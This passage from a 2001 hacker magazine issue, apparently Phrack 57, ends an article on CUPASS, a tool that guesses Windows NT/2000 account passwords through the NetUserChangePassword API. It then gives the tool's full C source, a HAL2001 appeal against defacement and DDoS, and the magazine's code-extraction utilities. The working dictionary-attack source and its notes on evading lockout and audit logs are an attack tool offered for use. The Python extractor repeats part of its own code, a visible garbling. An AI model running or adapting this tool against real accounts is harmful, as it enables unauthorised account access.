NetUserEnum etc. can be executed by all authenticated users. This includes Anonymous users, if the RestrictAnonymous policy setting allows anonymous access. On a W2K member server or workstation the NetUserChangePassword function should only be (successfully) executable by Administrators, Account Operators or the user of the account. That this isn't the case, can be shown with CUPASS, because here is the flaw that Microsoft made with his implementation of NetUserChangePassword. On W2K member servers and workstations, the NetUserChangePassword function can be successfully executed by any user who knows the current password of the attacked user account. ( For your information: The option 'User Must Log On in Order to Change Password' has been removed >from W2K! ) On a W2K domain controller with Active Directory, access to an object is granted based on the ACL of the object (Because W2K with installed AD stores the user passwords in the AD in contrast to NT 3.x/4). Network management query functions are permitted to all authenticated users and the members of the group "Pre-Windows 2000 compatible access" by the default ACL's. Theoretical Network Management Update functions like NUCP are only permitted to Administrators and Account Operators. That this is not the case, can also be shown with CUPASS. CUPASS works fine if AD is installed on the target system. If the "everyone" group is removed from the "Pre-Windows 2000 compatible access" group, the result of CUPASS will be Errorcode 5, which means ACCESS_DENIED!. My research shows that anyhow the password is guessed by CUPASS, but can not be changed because of insufficient permissions on the AD object! ----| ANONYMOUS CONNECT There is something I didn't talk about much, the Anonymous User Problem, also known as the NULL-User problem. Lets have a short look at how the Anonymous security settings will take affect to the NUCP problem: -> W2K --- The value Data of the following registry value regulates the behaviour of the operating system regarding to the NULL USER CONNECT. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA Value: RestrictAnonymous Value Type: REG_DWORD If RestrictAnonymous is set to 0 (zero), which is the default setting, CUPASS will work properly. If RestrictAnonymous is set to 1, what means the enumeration of SAM accounts and names is not allowed, CUPASS will work properly. If RestrictAnonymous is set to 2, what means no access without explicit anonymous permissions, there is no possibility to change the password with NUCP :( Because the value 2 has comprehensive consequences to the behaviour of the windows environment (e.g. Browser service will not work properly, netlogon secure channels could not be established properly by member workstations etc..) it is rare used. These settings are the same on W2K member server and W2K DC with AD! -> NT4 --- The value Data of the following registry value regulates the behaviour of the operating system regarding to the NULL USER CONNECT. HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA Value: RestrictAnonymous Value Type: REG_DWORD Converse to W2K there are only two valid values 0 (zero) and 1 for RestrictAnonymous. If RestrictAnonymous is set to 0 (zero), which is the default setting, CUPASS will work properly. If RestrictAnonymous is set to 1, what means the enumeration of SAM accounts and names is not allowed, CUPASS will work properly. COMMON ------ The process that calls the NetUserChangePassword function in some cases must have the SE_CHANGE_NOTIFY_NAME privilege (except for system account and members of the local Administrator group). Per default this privilege is enabled for every account, but can be disabled by the administrator. SE_CHANGE_NOTIFY_NAME could not be found at the privileges, because it is called "Bypass traverse checking"! This is an declarative from Microsoft. I tried it, but I didn't find a case in that this right was necessary to execute the NUCP function call. ----| POLICY AND LOGGING I will have a look for the policy settings, that will take affect to the NUCP problem. ACCOUNT POLICIES ---------------- ->PASSWORD POLICY --------------- The settings "Enforce password history" and "Minimum password age" will take effect to the result of CUPASS, in the way that CUPASS can't "realy" change the password, and the error code 2245 will result. But this doesn't matter, because we know the "old" password at this time, and CUPASS just tried to replace the "old" password with the "old" password again. ->ACCOUNT LOGOUT POLICY --------------------- Account lockout treshold ------------------------ The settings "Account lockout duration" and "Reset Account lockout after ..." are only relevant if the "Account lockout treshold" ist set to any value >0. If the treshold is set, than this takes affect to the work of CUPASS, because all attempts of CUPASS exceeding the treshold will lead to an account lockout :( However the Logout Policy ist not valid for the Administrator on NT4 environments, until the NT Reskit tool "Passprop" is used! In this case even the Administator account will be locked for network logons! If we start CUPASS against any account of a W2K server or a W2K domain controller with AD, this account is locked out, and even the Administrator account is marked as "Account is locked out", too ! But it is still possible for the Administrator account to log on interactive on the machine! AUDIT POLICY ------------ Lets have a look which auditing events have to enabled, to see an CUPASS attack in the security logs of the target machine. Audit Account Management ------------------------ If the setting "Audit Account Management" is enabled (success/failure), an entry with the ID 627 appears in in the security log. This entry contains all necessary datas for the administrator :( These e.g. are: Date, Time, Target Account Name, Caller User Name etc. Audit account logon events -------------------------- Surprisingly for some administrators, there appears no log entry if the settings "Audit account logon events" or "Audit logon events" are enabled, if the attack goes to the local machine. This is e.g. the case if you want to guess the local administrator password of your machine. If the CUPASS attack comes from remote, log entries ID 681 and ID 529 occures. Audit Object Access ------------------- If this type of auditing is enabled, and the attack goes to the local machine, an logfile entry with the ID 560 and 562 appears. ID 560 tells us that someone opened the object "Security Account Manager" whilst 562 tells us something like "Handle closed"... Maybe there occure some more logfile entries with other ID's, but these ones listed above are the ones I found while testing CUPASS. So test CUPASS on your own environment and have a look into your logfiles! ----| LAST WORDS I hope this article could give you a little overview about the NetUserChangePassword problem, and Microsoft's inconsequent implementation of security and function calls. This article could not treat this topic concluding, because there are so many different situations and configurations that I could not test in my short sparetime :) ----| GREETS Greets to Van Hauser who inspired me for this release, ganymed, mindmaniac and all the other members from THC, VAX who gives me a lift to HAL2001, the guys from TESO, Seth, Rookie and all the other people knowing me... The biggest THANX are going to my wife, who missed me nearly the whole weekend while I was writing this article! Ok, have a nice day and lets meet and party at HAL2001 :) <++> cupass.cpp !a10c7302 /* * CUPASS v1.0 (c) 2001 by Doc Holiday / THC * http://www.hackerschoice.com * * Dictionary Attack against Windows Passwords with NetUserChangePassword. * Do only use for legal purposes. * * Compiled and tested on Windows NT/W2K - runs not on Win9x!! * Compiled with VC++ 6.0 * */ #define UNICODE 1 #define _UNICODE 1 #include #include #include #include #pragma comment( lib, "netapi32.lib" ) void wmain( int argc, wchar_t *argv[] ) { wchar_t *hostname = 0; wchar_t *username = 0; wchar_t *dictfile = 0; wchar_t myChar[256]; NET_API_STATUS result; FILE *stream; LPWSTR oldpassword; if (argc != 4) { wprintf (L"\nMissing or wrong parameters!\n"); wprintf ( L"\nUsage: cupass \\\\hostname username dictionaryfile\n"); exit(1); } hostname = argv[1]; username = argv[2]; dictfile = argv[3]; if (wcsncmp(hostname, L"\\\\",2 )!=0) { wprintf (L"\nups... you forgot the double backslash?"); wprintf ( L"\nUsage: cupass \\\\hostname username dictionaryfile\n"); exit(1); } if( (stream = _wfopen( dictfile, L"r" )) == NULL ) { wprintf( L"\nups... dictionary %s could not be opened", dictfile ); wprintf (L"\nUsage: cupass \\\\hostname username dictionaryfile\n"); } else { wprintf (L"\n*** CUPASS 1.0 - Change User PASSword - by Doc Holiday/THC (c) 2001 ***\n"); wprintf (L"\nStarting attack .....\n"); wprintf (L"\nTarget: %s ", hostname); wprintf (L"\nUser: %s\n ", username); while( !feof( stream ) ) { fgetws (myChar, 256,stream); if (myChar[wcslen(myChar)-1] == '\r') myChar[wcslen(myChar)-1] = '\0'; if (myChar[wcslen(myChar)-1] == '\n') myChar[wcslen(myChar)-1] = '\0'; oldpassword = myChar; wprintf( L"\nTrying password %s \n", oldpassword ); result = NetUserChangePassword( hostname, username,oldpassword, oldpassword ); switch (result) { case 0: wprintf( L"GOTCHA!! Password was changed\n" ); wprintf( L"\nPassword from user '%s' is '%s'\n", username, oldpassword); fclose (stream); exit (1); break; case 5: //ERROR_ACCESS_DENIED wprintf (L"Attempt failed -> ERROR_ACCESS_DENIED - But password could be %s\n", oldpassword); fclose (stream); exit(1); break; case 86: //ERROR_INVALID_PASSWORD wprintf( L"Attempt failed -> Incorrect password\n" ); break; case 1351: //ERROR_CANT_ACCESS_DOMAIN_INFO wprintf (L"Attempt failed -> Can't establish connection to Host %s\n",hostname); fclose (stream); exit(1); break; case 1909: //ERROR_ACCOUNT_LOCKED_OUT wprintf (L"Attempt failed -> Account locked out\n"); fclose (stream); exit(1); break; case 2221: //NERR_UserNotFound) wprintf (L"Attempt failed -> User %s not found\n", username); fclose (stream); exit(1); break; case 2226://NERR_NotPrimary wprintf (L"Attempt failed -> Operation only allowed on PDC\n"); break; case 2245: wprintf (L"GOTCHA!! Password is '%s' , but couldn't be changed to '%s' due to password policy settings!\n", oldpassword, oldpassword); fclose(stream); exit(1); break; default: wprintf( L"\nAttempt failed :( %lu\n", result ); fclose(stream); exit(1); break; } } fclose (stream); } } <--> end cupass.cpp |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x11 of 0x12 Each phrack release has a special section called 'Phrack World News (PWN)'. The section is a combination of sum-up's, happenings and rumours. PWN are the news about and from the scene. You can send PWN directly to disorder@phrack.org or you can announce your own PWN at http://www.phrack.org/disorder. |=------------------=[ ScRiPt KiDdY MaNuAl To HaL2001 ]=-----------------=| |=-----------------------------------------------------------------------=| |=---------------------------=[ HAL Staff ]=-----------------------------=| Cops, Crimes, and HAL 2001 (http://www.hal2001.org) or ScRiPt KiDdY MaNuAl To HaL2001 When you arrive at HAL2001 and look around you, you may feel this is an ideal place to do script-kiddie things. I mean: with 1 GB of bandwidth coming almost all the way to your tent, a simple ping-flood is a mighty weapon. And with all these people around, there's bound to be someone within 10 meters that knows how to get root on that webhosting farm you found this morning. You may have also noticed all these other people around you. Most of them seem to be in some kind of different world. Most noticably, they're not constantly bragging about how many machines they have installed Stacheldraht on. When they talk about computer security you often don't understand, and they keep talking about vague political things a lot of the time. That's us. We are the rest of the hacker community. Weve been here for a while now, so you would probably just refer to most of us as "these old people". That's OK. We feel there are important things going on in the world today. Things worth fighting against. Governments and large corporations are basically taking over and are in the process of building mechanisms of control. That may sound difficult or weird, but think of new laws that allow instantaneous monitoring of anyone. Think of computer databases that know where everyone is in realtime. Think of cameras everywhere. Think of making you pay every time, for everything you watch or listen to. Think of your MP3 collection. Think of prison. - Making us all look bad Hey, let's not kid eachother: we weren't all that good when we were kids. But right now, powerful people all over the world would like to paint a picture of HAL2001 as a gathering of dangerous individuals out to destroy. While it may seem cool to have powerful people think of you as dangerous, you're only serving their purpose if you deface websites from here, or perform the mother of all DDoS attacks. You're helping the hardliners that say we are no good. They don't care about the websites you deface. They don't care about the DDoS attacks. Heck, their leadership doesn't even know how to hold a mouse. They care about making us all look like a threat, so they can get the public support needed to lock us all up. - Landing you in trouble But if you don't care about any of the above, here's another reason not to do bad things at HAL: there is almost no place on earth where the odds of getting arrested are stacked against you as bad as at HAL2001. Members of the dutch law enforcement community (yes: cops) are attending in large numbers. And public perception is that they haven't arrested enough people for computer crimes recently. So they are under a lot of pressure to arrest someone. Anyone.... Because few people have been convicted here, there is a notion that the cops in The Netherlands do not take this seriously. But defacing a site or doing Denial of Service are serious crimes here, and you may not be going home for quite a while if you're arrested here. Being arrested at HAL makes your case a "big deal", no matter how little may have actually happened. This means they are less likely to let you off with a slap on the wrist. And if HAL is anything like its predecessors, intelligence people frominternal security agencies of most industrialised nations are walkingaround, and will see if anyone from their country is sticking their head out doing naughty things. HAL is an excellent place to become visible, in many different and often interesting ways. - Getting us all disconnected Just like at HIP97, the authorities have pre-signed orders ready and waiting to cut our link to the world if the HAL network becomes a source of too many problems. Yes, you read it right: cut the link. 100% packet loss. HAL2001 has some of the worlds best system administrators monitoring our link to see if everything runs smooth. Some of these people already had a deep understanding of computer security issues before you were even born. And *ofcourse* they are monitoring to see if anyone is causing problems, either to our own network operations, or to the outside world. So do us all and yourself a favour, and please don't be stupid. And if you still insist on causing trouble, think of this: if you do manage to get us all diconnected, maybe you should hope the cops get to you first. - Growing up If you have it in you, now would be an excellent time to grow up. Live a life in the hacker community that goes beyond defacing websites and performing dDoS attacks. The post script-kiddie existence offers many rewards: you might have feeling you've done something useful more often, people won't look at you funny, and you might even get to meet girls. Perhaps even more importantly: we as a community _need_ you to grow up. As we said: Governments and large corporations are taking control of our world at alarming speed. Hackers are more likely to understand what's going on, and to do something about it. Which is one reason why they are being demonized by parties seeking to monitor the whole population's every move. Many privacy enhancing technologies still need to be built, and a whole new generation needs to be made aware that their freedoms are being dismantled. Your help would be greatly appreciated. |=[ Fun ]=---------------------------------------------------------------=| http://www.microsoft.com/office/clippy/images/rollover_4.gif N0 L0GZ == N0 CRIME ! |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x12 of 0x12 |=--------=[ P H R A C K E X T R A C T I O N U T I L I T Y ]=--------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ phrackstaff ]=----------------------------=| The Phrack Magazine Extraction Utility, first appearing in P50, is a convenient way to extract code from textual ASCII articles. It preserves readability and 7-bit clean ASCII codes. As long as there are no extraneous "<++>" or <-->" in the article, everything runs swimmingly. Source and precompiled version (windows, unix, ...) is available at http://www.phrack.org/misc. |-----------------------------------------------------------------------------| <++> p56/EX/PMEU/extract4.c !8e2bebc6 /* * extract.c by Phrack Staff and sirsyko * * Copyright (c) 1997 - 2000 Phrack Magazine * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * * extract.c * Extracts textfiles from a specially tagged flatfile into a hierarchical * directory structure. Use to extract source code from any of the articles * in Phrack Magazine (first appeared in Phrack 50). * * Extraction tags are of the form: * * host:~> cat testfile * irrelevant file contents * <++> path_and_filename1 !CRC32 * file contents * <--> * irrelevant file contents * <++> path_and_filename2 !CRC32 * file contents * <--> * irrelevant file contents * <++> path_and_filenamen !CRC32 * file contents * <--> * irrelevant file contents * EOF * * The `!CRC` is optional. The filename is not. To generate crc32 values * for your files, simply give them a dummy value initially. The program * will attempt to verify the crc and fail, dumping the expected crc value. * Use that one. i.e.: * * host:~> cat testfile * this text is ignored by the program * <++> testarooni !12345678 * text to extract into a file named testarooni * as is this text * <--> * * host:~> ./extract testfile * Opened testfile * - Extracting testarooni * crc32 failed (12345678 != 4a298f18) * Extracted 1 file(s). * * You would use `4a298f18` as your crc value. * * Compilation: * gcc -o extract extract.c * * ./extract file1 file2 ... filen */ #include #include #include #include #include #include #include #include #include #define VERSION "7niner.20000430 revsion q" #define BEGIN_TAG "<++> " #define END_TAG "<-->" #define BT_SIZE strlen(BEGIN_TAG) #define ET_SIZE strlen(END_TAG) #define EX_DO_CHECKS 0x01 #define EX_QUIET 0x02 struct f_name { u_char name[256]; struct f_name *next; }; unsigned long crcTable[256]; void crcgen() { unsigned long crc, poly; int i, j; poly = 0xEDB88320L; for (i = 0; i < 256; i++) { crc = i; for (j = 8; j > 0; j--) { if (crc & 1) { crc = (crc >> 1) ^ poly; } else { crc >>= 1; } } crcTable[i] = crc; } } unsigned long check_crc(FILE *fp) { register unsigned long crc; int c; crc = 0xFFFFFFFF; while( (c = getc(fp)) != EOF ) { crc = ((crc >> 8) & 0x00FFFFFF) ^ crcTable[(crc ^ c) & 0xFF]; } if (fseek(fp, 0, SEEK_SET) == -1) { perror("fseek"); exit(EXIT_FAILURE); } return (crc ^ 0xFFFFFFFF); } int main(int argc, char **argv) { char *name; u_char b[256], *bp, *fn, flags; int i, j = 0, h_c = 0, c; unsigned long crc = 0, crc_f = 0; FILE *in_p, *out_p = NULL; struct f_name *fn_p = NULL, *head = NULL, *tmp = NULL; while ((c = getopt(argc, argv, "cqv")) != EOF) { switch (c) { case 'c': flags |= EX_DO_CHECKS; break; case 'q': flags |= EX_QUIET; break; case 'v': fprintf(stderr, "Extract version: %s\n", VERSION); exit(EXIT_SUCCESS); } } c = argc - optind; if (c < 2) { fprintf(stderr, "Usage: %s [-cqv] file1 file2 ... filen\n", argv[0]); exit(0); } /* * Fill the f_name list with all the files on the commandline (ignoring * argv[0] which is this executable). This includes globs. */ for (i = 1; (fn = argv[i++]); ) { if (!head) { if (!(head = (struct f_name *)malloc(sizeof(struct f_name)))) { perror("malloc"); exit(EXIT_FAILURE); } strncpy(head->name, fn, sizeof(head->name)); head->next = NULL; fn_p = head; } else { if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name)))) { perror("malloc"); exit(EXIT_FAILURE); } fn_p = fn_p->next; strncpy(fn_p->name, fn, sizeof(fn_p->name)); fn_p->next = NULL; } } /* * Sentry node. */ if (!(fn_p->next = (struct f_name *)malloc(sizeof(struct f_name)))) { perror("malloc"); exit(EXIT_FAILURE); } fn_p = fn_p->next; fn_p->next = NULL; /* * Check each file in the f_name list for extraction tags. */ for (fn_p = head; fn_p->next; ) { if (!strcmp(fn_p->name, "-")) { in_p = stdin; name = "stdin"; } else if (!(in_p = fopen(fn_p->name, "r"))) { fprintf(stderr, "Could not open input file %s.\n", fn_p->name); fn_p = fn_p->next; continue; } else { name = fn_p->name; } if (!(flags & EX_QUIET)) { fprintf(stderr, "Scanning %s...\n", fn_p->name); } crcgen(); while (fgets(b, 256, in_p)) { if (!strncmp(b, BEGIN_TAG, BT_SIZE)) { b[strlen(b) - 1] = 0; /* Now we have a string. */ j++; crc = 0; crc_f = 0; if ((bp = strchr(b + BT_SIZE + 1, '/'))) { while (bp) { *bp = 0; if (mkdir(b + BT_SIZE, 0700) == -1 && errno != EEXIST) { perror("mkdir"); exit(EXIT_FAILURE); } *bp = '/'; bp = strchr(bp + 1, '/'); } } if ((bp = strchr(b, '!'))) { crc_f = strtoul((b + (strlen(b) - strlen(bp)) + 1), NULL, 16); b[strlen(b) - strlen(bp) - 1 ] = 0; h_c = 1; } else { h_c = 0; } if ((out_p = fopen(b + BT_SIZE, "wb+"))) { fprintf(stderr, ". Extracting %s\n", b + BT_SIZE); } else { printf(". Could not extract anything from '%s'.\n", b + BT_SIZE); continue; } } else if (!strncmp (b, END_TAG, ET_SIZE)) { if (out_p) { if (h_c == 1) { if (fseek(out_p, 0l, 0) == -1) { perror("fseek"); exit(EXIT_FAILURE); } crc = check_crc(out_p); if (crc == crc_f && !(flags & EX_QUIET)) { fprintf(stderr, ". CRC32 verified (%08lx)\n", crc); } else { if (!(flags & EX_QUIET)) { fprintf(stderr, ". CRC32 failed (%08lx != %08lx)\n", crc_f, crc); } } } fclose(out_p); } else { fprintf(stderr, ". `%s` had bad tags.\n", fn_p->name); continue; } } else if (out_p) { fputs(b, out_p); } } if (in_p != stdin) { fclose(in_p); } tmp = fn_p; fn_p = fn_p->next; free(tmp); } if (!j) { printf("No extraction tags found in list.\n"); } else { printf("Extracted %d file(s).\n", j); } return (0); } /* EOF */ <--> <++> p56/EX/PMEU/extract.pl !1a19d427 # Daos #!/bin/sh -- # -*- perl -*- -n eval 'exec perl $0 -S ${1+"$@"}' if 0; $opening=0; if (/^\<\+\+\>/) {$curfile = substr($_ , 5); $opening=1;}; if (/^\<\-\-\>/) {close ct_ex; $opened=0;}; if ($opening) { chop $curfile; $sex_dir= substr( $curfile, 0, ((rindex($curfile,'/'))) ) if ($curfile =~ m/\//); eval {mkdir $sex_dir, "0777";}; open(ct_ex,">$curfile"); print "Attempting extraction of $curfile\n"; $opened=1; } if ($opened && !$opening) {print ct_ex $_}; <--> <++> p56/EX/PMEU/extract.awk !26522c51 #!/usr/bin/awk -f # # Yet Another Extraction Script # - # /^\<\+\+\>/ { ind = 1 File = $2 split ($2, dirs, "/") Dir="." while ( dirs[ind+1] ) { Dir=Dir"/"dirs[ind] system ("mkdir " Dir" 2>/dev/null") ++ind } next } /^\<\-\-\>/ { File = "" next } File { print >> File } <--> <++> p56/EX/PMEU/extract.sh !a81a2320 #!/bin/sh # exctract.sh : Written 9/2/1997 for the Phrack Staff by # # note, this file will create all directories relative to the current directory # originally a bug, I've now upgraded it to a feature since I dont want to deal # with the leading / (besides, you dont want hackers giving you full pathnames # anyway, now do you :) # Hopefully this will demonstrate another useful aspect of IFS other than # haxoring rewt # # Usage: ./extract.sh cat $* | ( Working=1 while [ $Working ]; do OLDIFS1="$IFS" IFS= if read Line; then IFS="$OLDIFS1" set -- $Line case "$1" in "<++>") OLDIFS2="$IFS" IFS=/ set -- $2 IFS="$OLDIFS2" while [ $# -gt 1 ]; do File=${File:-"."}/$1 if [ ! -d $File ]; then echo "Making dir $File" mkdir $File fi shift done File=${File:-"."}/$1 echo "Storing data in $File" ;; "<-->") if [ "x$File" != "x" ]; then unset File fi ;; *) if [ "x$File" != "x" ]; then IFS= echo "$Line" >> $File IFS="$OLDIFS1" fi ;; esac IFS="$OLDIFS1" else echo "End of file" unset Working fi done ) <--> <++> p56/EX/PMEU/extract.py !83f65f60 #! /bin/env python # extract.py Timmy 2tone <_spoon_@usa.net> import sys, string, getopt, os class Datasink: """Looks like a file, but doesn't do anything.""" def write(self, data): pass def close(self): pass def extract(input, verbose = 1): """Read a file from input until we find the end token.""" if type(input) == type('string'): fname = input try: input = open(fname) except IOError, (errno, why): print "Can't open %s: %s" % (fname, why) return errno else: fname = '' % input.fileno() inside_embedded_file = 0 linecount = 0 line = input.readline() while line: if not inside_embedded_file and line[:4] == '<++>': inside_embedded_file = 1 linecount = 0 filename = string.strip(line[4:]) if mkdirs_if_any(filename) != 0: pass try: output = open(filename, 'w') except IOError, (errno, why): print "Can't open %s: %s; skipping file" % (filename, why) output = Datasink() continue if verbose: print 'Extracting embedded file %s from %s...' % (filename, fname), elif inside_embedded_file and line[:4] == '<-->': output.close() inside_embedded_file = 0 if verbose and not isinstance(output, Datasink): print '[%d lines]' % linecount elif inside_embedded_file: output.write(line) # Else keep looking for a start token. line = input.readline() linecount = linecount + 1 def mkdirs_if_any(filename, verbose = 1): """Check for existance of /'s in filename, and make directories.""" path, file = os.path.split(filename) if not path: return errno = 0 start = os.getcwd() components = string.split(path, os.sep) for dir in components: if not os.path.exists(dir): try: os.mkdir(dir) if verbose: print 'Created directory', path except os.error, (errno, why): print "Can't make directory %s: %s" % (dir, why) break try: os.chdir(dir) except os.error, (errno, why): print "Can't cd to directory %s: %s" % (dir, why) break os.chdir(start) return errno def usage(): """Blah.""" die('Usage: extract.py [-V] filename [filename...]') def main(): try: optlist, args = getopt.getopt(sys.argv[1:], 'V') except getopt.error, why: usage() if len(args) <= 0: usage() if ('-V', '') in optlist: verbose = 0 else: verbose = 1 for filename in args: if verbose: print 'Opening source file', filename + '...' extract(filename, verbose) def db(filename = 'P51-11'): """Run this script in the python debugger.""" import pdb sys.argv[1:] = ['-v', filename] pdb.run('extract.main()') def die(msg, errcode = 1): print msg sys.exit(errcode) if __name__ == '__main__': try: main() except KeyboardInterrupt: pass except getopt.error, why: usage() if len(args) <= 0: usage() if ('-V', '') in optlist: verbose = 0 else: verbose = 1 for filename in args: if verbose: print 'Opening source file', filename + '...' extract(filename, verbose) def db(filename = 'P51-11'): """Run this script in the python debugger.""" import pdb sys.argv[1:] = [filename] pdb.run('extract.main()') def die(msg, errcode = 1): print msg sys.exit(errcode) if __name__ == '__main__': try: main() except KeyboardInterrupt: pass # No messy traceback. <--> <++> p56/EX/PMEU/extract-win.c !e519375d /***************************************************************************/ /* WinExtract */ /* */ /* Written by Fotonik . */ /* */ /* Coding of WinExtract started on 22aug98. */ /* */ /* This version (1.0) was last modified on 22aug98. */ /* */ /* This is a Win32 program to extract text files from a specially tagged */ /* flat file into a hierarchical directory structure. Use to extract */ /* source code from articles in Phrack Magazine. The latest version of */ /* this program (both source and executable codes) can be found on my */ /* website: http://www.altern.com/fotonik */ /***************************************************************************/ #include #include #include void PowerCreateDirectory(char *DirectoryName); int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst, LPSTR lpszArgs, int nWinMode) { OPENFILENAME OpenFile; /* Structure for Open common dialog box */ char InFileName[256]=""; char OutFileName[256]; char Title[]="WinExtract - Choose a file to extract files from."; FILE *InFile; FILE *OutFile; char Line[256]; char DirName[256]; int FileExtracted=0; /* Flag used to determine if at least one file was */ int i; /* extracted */ ZeroMemory(&OpenFile, sizeof(OPENFILENAME)); OpenFile.lStructSize=sizeof(OPENFILENAME); OpenFile.hwndOwner=HWND_DESKTOP; OpenFile.hInstance=hThisInst; OpenFile.lpstrFile=InFileName; OpenFile.nMaxFile=sizeof(InFileName)-1; OpenFile.lpstrTitle=Title; OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY; if(GetOpenFileName(&OpenFile)) { if((InFile=fopen(InFileName,"r"))==NULL) { MessageBox(NULL,"Could not open file.",NULL,MB_OK); return 0; } /* If we got here, InFile is opened. */ while(fgets(Line,256,InFile)) { if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */ { Line[strlen(Line)-1]='\0'; strcpy(OutFileName,Line+5); /* Check if a dir has to be created and create one if necessary */ for(i=strlen(OutFileName)-1;i>=0;i--) { if((OutFileName[i]=='\\')||(OutFileName[i]=='/')) { strncpy(DirName,OutFileName,i); DirName[i]='\0'; PowerCreateDirectory(DirName); break; } } if((OutFile=fopen(OutFileName,"w"))==NULL) { MessageBox(NULL,"Could not create file.",NULL,MB_OK); fclose(InFile); return 0; } /* If we got here, OutFile can be written to */ while(fgets(Line,256,InFile)) { if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */ { fputs(Line, OutFile); } else { break; } } fclose(OutFile); FileExtracted=1; } } fclose(InFile); if(FileExtracted) { MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK); } else { MessageBox(NULL,"Nothing to extract.","Warning",MB_OK); } } return 1; } /* PowerCreateDirectory is a function that creates directories that are */ /* down more than one yet unexisting directory levels. (e.g. c:\1\2\3) */ void PowerCreateDirectory(char *DirectoryName) { int i; int DirNameLength=strlen(DirectoryName); char DirToBeCreated[256]; for(i=1;i |=[ EOF ]=---------------------------------------------------------------=|